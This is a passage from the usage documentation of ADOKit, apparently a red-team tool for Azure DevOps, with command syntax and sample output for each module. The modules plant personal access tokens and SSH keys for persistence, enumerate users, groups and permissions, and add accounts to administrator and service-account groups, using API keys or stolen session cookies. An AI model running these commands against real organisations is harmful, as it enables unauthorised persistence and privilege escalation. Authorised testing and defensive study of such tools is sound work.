https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

3/29/23 15:28:37 Finished execution of searchfile

Create PAT

Use Case

Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:09 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

3/31/23 18:33:10 Finished execution of createpat

List PATs

Use Case

List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.

Syntax

Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:17 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

3/31/23 18:33:18 Finished execution of listpat

Remove PAT

Use Case

Remove a PAT for a given user in an Azure DevOps instance.

Syntax

Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:04:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

4/3/23 15:05:00 Finished execution of removepat

Create SSH Key

Use Case

Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

Example Output

C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 2:51:22 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

4/3/23 18:51:24 Finished execution of createsshkey

List SSH Keys

Use Case

List all public SSH keys for a given user in an Azure DevOps instance.

Syntax

Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:37:10 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 15:37:11 Finished execution of listsshkey

Remove SSH Key

Use Case

Remove an SSH key for a given user in an Azure DevOps instance.

Syntax

Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 1:50:08 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 17:50:09 Finished execution of removesshkey

List Users

Use Case

List users within an Azure DevOps instance

Syntax

Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:07 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com

4/3/23 20:12:08 Finished execution of listuser

Search User

Use Case

Search for given user(s) in Azure DevOps instance

Syntax

Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

Example Output

C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:23 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmic rosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com

4/3/23 20:12:24 Finished execution of searchuser

List Groups

Use Case

List groups within an Azure DevOps instance

Syntax

Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


---SNIP---

4/3/23 20:48:46 Finished execution of listgroup

Search Groups

Use Case

Search for given group(s) in Azure DevOps instance

Syntax

Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

Example Output

C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:41 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

4/3/23 20:48:42 Finished execution of searchgroup

Get Group Members

Use Case

List all group members for a given group

Syntax

Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

Example Output

C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:03 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

4/4/23 13:11:09 Finished execution of getgroupmembers

Get Project Permissions

Use Case

Get a listing of who has permissions to a given project.

Syntax

Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

Example Output

C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


[*] INFO: List ing group members for each group that has permissions to this project



GROUP NAME: [MaraudersMap]\Build Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Contributors

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


GROUP NAME: [MaraudersMap]\MaraudersMap Team

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Valid Users

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Readers

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

4/4/23 13:11:18 Finished execution of getpermissions

Add Project Admin

Use Case

Add a user to the Project Administrators group for a given project.

Syntax

Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 2:52:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/4/23 18:52:47 Finished execution of addprojectadmin

Remove Project Admin

Use Case

Remove a user from the Project Administrators group for a given project.

Syntax

Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:19:43 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

4/4/23 19:19:44 Finished execution of removeprojectadmin

Add Build Admin

Use Case

Add a user to the Build Administrators group for a given project.

Syntax

Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:41:51 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/4/23 19:41:55 Finished execution of addbuildadmin

Remove Build Admin

Use Case

Remove a user from the Build Administrators group for a given project.

Syntax

Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:42:10 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

4/4/23 19:42:11 Finished execution of removebuildadmin

Add Collection Admin

Use Case

Add a user to the Project Collection Administrators group.

Syntax

Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:04:40 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/4/23 20:04:43 Finished execution of addcollectionadmin

Remove Collection Admin

Use Case

Remove a user from the Project Collection Administrators group.

Syntax

Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:10:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

4/4/23 20:10:38 Finished execution of removecollectionadmin

Add Collection Build Admin

Use Case

Add a user to the Project Collection Build Administrators group.

Syntax

Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:39 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

Remove Collection Build Admin

Use Case

Remove a user from the Project Collection Build Administrators group.

Syntax

Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

Add Collection Build Service Account

Use Case

Add a user to the Project Collection Build Service Accounts group.

Syntax

Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:13 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

Remove Collection Build Service Account

Use Case

Remove a user from the Project Collection Build Service Accounts group.

Syntax

Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:27 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

Add Collection Service Account

Use Case

Add a user to the Project Collection Service Accounts group.

Syntax

